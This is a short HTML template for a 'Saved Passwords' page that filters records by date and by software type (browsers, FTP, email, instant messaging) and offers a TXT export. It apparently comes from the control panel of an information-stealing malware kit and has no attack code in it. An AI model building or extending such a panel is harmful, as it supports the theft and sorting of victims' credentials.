<div class="info-text1">
				<center>Saved Passwords</center>
					<form action="?page=reports">
							Filter: <input type="text" class="edit" name="search" value="%search%">
							<input type="hidden" name="page" value="passwords"><br>
							Date from:  	<input type="date" class="edit" name="datefrom" value="%datefrom%"><br>
							Date up:  	<input type="date" class="edit" name="dateup" value="%dateup%"><br>
							<input type="checkbox" name="soft_type1" value="1" %chk1%>Browsers<Br>
							<input type="checkbox" name="soft_type2" value="1" %chk2%>FTP<Br> 
							<input type="checkbox" name="soft_type3" value="1" %chk3%>EMAIL<Br> 
							<input type="checkbox" name="soft_type4" value="1" %chk4%>IM<Br> 
							 
							<input type="submit" value=">>" class="sbutton"><input type="checkbox" name="txt" value="1">TXT<Br>
						</form>
			</div>
			